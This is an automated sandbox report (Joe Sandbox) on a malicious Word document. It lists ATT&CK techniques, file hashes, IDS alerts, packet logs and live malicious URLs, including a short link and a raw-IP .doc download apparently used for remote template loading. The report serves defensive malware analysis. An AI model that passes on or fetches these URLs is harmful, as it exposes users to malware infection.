Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMP 7527518303 2507294.docx.doc	14%	Virustotal		Browse
IMP 7527518303 2507294.docx.doc	17%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://kuhlinks.de/3ri5DVX	0%	Avira URL Cloud	safe
http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
a726.dscd.akamai.net	23.219.161.152	true	false	high
s-0005.dual-s-msedge.net	52.123.129.14	true	false	high
kuhlinks.de	172.67.144.140	true	false	high
185.224.9.216.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc	true	Avira URL Cloud: safe	unknown
https://kuhlinks.de/3ri5DVX	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.144.140	kuhlinks.de	United States		13335	CLOUDFLARENETUS	false
216.9.224.185	unknown	Reserved		7018	ATT-INTERNET4US	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1654507
Start date and time:	2025-04-02 11:59:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IMP 7527518303 2507294.docx.doc
Detection:	MAL
Classification:	mal60.evad.winDOC@2/4@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.20.38, 52.109.4.7, 52.182.143.211, 52.109.8.36, 52.111.251.16, 52.111.251.18, 52.111.251.19, 52.111.251.17, 23.33.42.72, 23.33.42.76, 52.123.129.14, 40.126.24.146, 23.219.161.152, 20.109.210.53
Excluded domains from analysis (whitelisted): us1.odcsm1.live.com.akadns.net, odc.officeapps.live.com, slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, templatesmetadata.office.net.edgekey.net, res-1.cdn.office.net, mobile.events.data.microsoft.com, prod-canc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, osiprod-eus2-bronze-azsc-000.eastus2.cloudapp.azure.com, templatesmetadata.office.net, c.pki.goog, ecs.office.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, res-stls-prod.edgesuite.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, eus2-azsc-000.odc.officeapps.live.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, n
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.144.140	Solicitud de cotizaci#U00f3n.xls	Get hash	malicious	Remcos, DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a726.dscd.akamai.net	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	23.200.0.22
	Provider Document.html	Get hash	malicious	HTMLPhisher	Browse	23.62.47.145
	VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm	Get hash	malicious	Unknown	Browse	23.206.121.16
	http://benedictocollege1-my.sharepoint.com/:f:/g/personal/ryacassey_montillano_benedictocollege_edu_ph/EqNqk_rEp1RHm2UFQLxbuYoBbS5GFhosjapIHgSzIrrsZQ?e=4SvNeC	Get hash	malicious	Unknown	Browse	23.206.121.35
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	23.206.121.45
	Message.eml	Get hash	malicious	Unknown	Browse	23.206.121.54
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	23.53.126.44
	NMDC01042025.xls	Get hash	malicious	Unknown	Browse	23.204.152.198
	Message.eml	Get hash	malicious	Unknown	Browse	23.53.126.12
	RFQ-Pietro Bonaiti P0 24081128 04.xlsx	Get hash	malicious	Unknown	Browse	23.206.121.54
kuhlinks.de	Solicitud de cotizaci#U00f3n.xls	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.47.51
s-0005.dual-s-msedge.net	Newsletter Avril 2025 (206Ko).msg	Get hash	malicious	Unknown	Browse	52.123.128.14
	FW What it takes to build a great search mobile experience.msg	Get hash	malicious	Unknown	Browse	52.123.128.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.128.14
	Revised - Buncombe county government 2025 Handbook33469.doc	Get hash	malicious	Unknown	Browse	52.123.129.14
	VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm	Get hash	malicious	Unknown	Browse	52.123.128.14
	VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm	Get hash	malicious	Unknown	Browse	52.123.129.14
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	52.123.129.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	T1-mh1-310325.bat	Get hash	malicious	Braodo	Browse	104.17.112.233
	eSYM74Zqsg.bat	Get hash	malicious	Unknown	Browse	104.18.111.161
	OPhdi5uSb6.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	172.67.168.77
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.197.67
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.197.67
	NEW ORDER_PDF.exe	Get hash	malicious	FormBook	Browse	172.67.132.85
	rRoklubber.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	Draft Copy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	invoice.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.131.170
ATT-INTERNET4US	xd.mips.elf	Get hash	malicious	Mirai	Browse	108.76.39.172
	xd.powerpc-440fp.elf	Get hash	malicious	Mirai	Browse	68.90.163.145
	xd.arm.elf	Get hash	malicious	Mirai	Browse	108.219.97.68
	xd.x86.elf	Get hash	malicious	Mirai	Browse	108.253.120.12
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	172.146.100.88
	xd.i686.elf	Get hash	malicious	Mirai	Browse	99.116.15.45
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	63.207.1.40
	xd.spc.elf	Get hash	malicious	Mirai	Browse	70.132.145.224
	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	108.80.129.103

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
258a5a1e95b8a911872bae9081526644	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	Nuevo Orden.xlam.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	NMDC01042025.xls	Get hash	malicious	Unknown	Browse	172.67.144.140
	RFQ-Pietro Bonaiti P0 24081128 04.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	PO#267759.xlam.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	PO223445.xlam.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	transferencia interbancaria_swift.xlam.xlsx	Get hash	malicious	Unknown	Browse	172.67.144.140
	swift PI RSEK25001.docx.doc	Get hash	malicious	Unknown	Browse	172.67.144.140

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	213027
Entropy (8bit):	7.948399481754145
Encrypted:	false
SSDEEP:	6144:WBRGkODAZzMhFeWcgtl9h7AZIDRNX3WpYT5+vq/3+:WBRGtIYhcHgtlT7AZgzX3WpYd+Cf+
MD5:	B2CFE4E497E5425F37473132A266CAEE
SHA1:	EB82E689BC8BA6A7F9E3EFC41E7285EB55FE2932
SHA-256:	41EEE7653732F460B1B8EAF06CE15171993B4161B748690462B7B5F7C2D74E92
SHA-512:	6D214462ED92A12C28B26C2D41B4439252089AAF7ECA4C855EF6795214EBA0BCA322FEA4E050414814D59C191948C07AED53E60236BB98740A6CE3DA664A973F
Malicious:	true
Reputation:	low
Preview:	PK..........!.Jj.@............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0....."..."..j.......`.Ic.<SH.~'M[!D.r..I.....c;...[g.'Hh./.i1...h....w.;?....Z...+@q9.q2._E...=..!..Rb.SX...#uHN.?....zT......'.S.!.k...Rv....\-..>...q]}.w..fM....T..T.8...~E.o...\.`c"..=....}...M.:TK.%...Jc.@....>+...A..KFCv...Q...sHZ......wj1....H0.........._O..........Q.Dx....Q.....C .h...I.B..#1l......!.~=A/\|..........^.H...?._..o^....^..S... .H.B...._?...2.,9....<x.................Y...A7.h.ox...6

C:\Users\user\Desktop\~$P 7527518303 2507294.docx.doc

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.995306296759881
Encrypted:	false
SSDEEP:	3:blRmMF/PZH/bji/fl0/+KBJliE9DxV:bzmMW/6/+Slf9P
MD5:	9E120176582E3EA25644F0FB8DB76AB8
SHA1:	1E8EF22465F0C2389DA68098DDAEC62F0503D45E
SHA-256:	FA1D701EE83AFB14841553BB5715B3057A0B6B664CC3912534B3F17AC0C965C7
SHA-512:	F426D8613414550ECD3251D9E50FC4F1F703BB15BC9D96E4A74A7E969E039769985ECDC0617756FE85DEA07B793D05070AA9F7B3EC7C04280F2F54A9DE123FDD
Malicious:	false
Reputation:	low
Preview:	.user..................................................M.a.o.g.a........5....p<.BV...p<.BV...................................8}......dE..R..................6..<

C:\Users\user\Desktop\~WRD0000.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	213027
Entropy (8bit):	7.948399481754145
Encrypted:	false
SSDEEP:	6144:WBRGkODAZzMhFeWcgtl9h7AZIDRNX3WpYT5+vq/3+:WBRGtIYhcHgtlT7AZgzX3WpYd+Cf+
MD5:	B2CFE4E497E5425F37473132A266CAEE
SHA1:	EB82E689BC8BA6A7F9E3EFC41E7285EB55FE2932
SHA-256:	41EEE7653732F460B1B8EAF06CE15171993B4161B748690462B7B5F7C2D74E92
SHA-512:	6D214462ED92A12C28B26C2D41B4439252089AAF7ECA4C855EF6795214EBA0BCA322FEA4E050414814D59C191948C07AED53E60236BB98740A6CE3DA664A973F
Malicious:	false
Reputation:	low
Preview:	PK..........!.Jj.@............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0....."..."..j.......`.Ic.<SH.~'M[!D.r..I.....c;...[g.'Hh./.i1...h....w.;?....Z...+@q9.q2._E...=..!..Rb.SX...#uHN.?....zT......'.S.!.k...Rv....\-..>...q]}.w..fM....T..T.8...~E.o...\.`c"..=....}...M.:TK.%...Jc.@....>+...A..KFCv...Q...sHZ......wj1....H0.........._O..........Q.Dx....Q.....C .h...I.B..#1l......!.~=A/\|..........^.H...?._..o^....^..S... .H.B...._?...2.,9....<x.................Y...A7.h.ox...6

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.99456518308567
TrID:	Word Microsoft Office Open XML Format document (49504/1) 58.23% Word Microsoft Office Open XML Format document (27504/1) 32.35% ZIP compressed archive (8000/1) 9.41%
File name:	IMP 7527518303 2507294.docx.doc
File size:	198'372 bytes
MD5:	c8675988aa2bc47338861b4d62aa517d
SHA1:	67366589c5fbfa1153aa10a3d06b88d12719cdca
SHA256:	315b8754f30097fb04f76e09719a8415c53103a8c8abd6c7e988a918a2791476
SHA512:	9ba648f7362f74b44c0a752af1d8ff96859bf6da820e3e5503a51548e1864b17c3783aec66017ad29d9e632793a6613c386f84b03fc6fa14b00001ca74d775b2
SSDEEP:	3072:s3+eKSeRCX3Wp5STIrGvy3KJorM/+nKiTXcN7H4siQvIOKDS5QZV:s3peoX3WpYTvHqrM/jiTXgxvYeIV
TLSH:	6814227A523161D6CF6A05B11585CFAC5649402E28053AEBEF3067CFCCFBA7D5E79880
File Content Preview:	PK........BX.Z................[Content_Types].xmlUT...Y..gY..gY..g.VKk.@......^..v....9..1.4.....Z./v&...;k9..Tr.._$..{.c.]\..-^ .....j&..M...j.....".$....C-6..jy.i......=..#._........<G...".L+.U..V /f......SI.C,.wl ....Jt.......lC ...b:Q\..,]...5."6._.~'

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "IMP 7527518303 2507294.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-02T12:00:40.599604+0200	1810005	Joe Security ANOMALY Microsoft Office WebDAV Discovery	1	192.168.2.24	60833	172.67.144.140	443	TCP
2025-04-02T12:00:42.919911+0200	1810004	Joe Security ANOMALY Microsoft Office HTTP activity	1	192.168.2.24	60838	172.67.144.140	443	TCP
2025-04-02T12:00:43.414685+0200	1810004	Joe Security ANOMALY Microsoft Office HTTP activity	1	192.168.2.24	60840	216.9.224.185	80	TCP

Network Port Distribution

Total Packets: 131
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 2, 2025 12:00:38.853153944 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:38.853197098 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:38.853286028 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:38.853828907 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:38.853838921 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.084008932 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.084631920 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.086549997 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.086561918 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.086813927 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.087825060 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.128278971 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.661459923 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.661554098 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.661628962 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.662909985 CEST	60832	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.662931919 CEST	443	60832	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.690762997 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.690800905 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.690880060 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.692805052 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.692812920 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.961561918 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.961777925 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.963179111 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.963185072 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.964215040 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.964334965 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.965614080 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.965671062 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.965732098 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.965735912 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:39.965779066 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:39.968780994 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.016274929 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.599621058 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.599719048 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.599731922 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.599772930 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.599783897 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.599814892 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.604208946 CEST	60833	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.604227066 CEST	443	60833	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.624747992 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.624802113 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.624939919 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.625432014 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.625442028 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.898474932 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.900243998 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.900306940 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:40.900712013 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:40.900727034 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:41.553364992 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:41.553443909 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:41.553508997 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:41.554408073 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:41.554408073 CEST	60834	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:41.554454088 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:41.554486036 CEST	443	60834	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:41.560941935 CEST	60836	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:41.830055952 CEST	80	60836	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:41.830141068 CEST	60836	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:41.830538034 CEST	60836	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:42.086951971 CEST	80	60836	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:42.136091948 CEST	60836	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:42.155586004 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.155602932 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.155658007 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.157167912 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.157177925 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.356759071 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.356863976 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.358457088 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.358469009 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.358800888 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.358853102 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.359623909 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.359687090 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.359736919 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.359854937 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.400274992 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.919908047 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.920037985 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.920106888 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.921897888 CEST	60838	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:42.921916962 CEST	443	60838	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:42.923511028 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.166501045 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.166635036 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.166783094 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.414607048 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414628983 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414644003 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414659023 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414673090 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414685011 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.414689064 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414704084 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414717913 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.414721012 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414735079 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.414736986 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414753914 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.414767981 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.414792061 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.664691925 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.664756060 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.665791988 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.665808916 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.665827990 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.665834904 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.665844917 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.665859938 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.665859938 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.665868044 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.665889025 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.665909052 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.665936947 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.665951967 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.665960073 CEST	80	60840	216.9.224.185	192.168.2.24
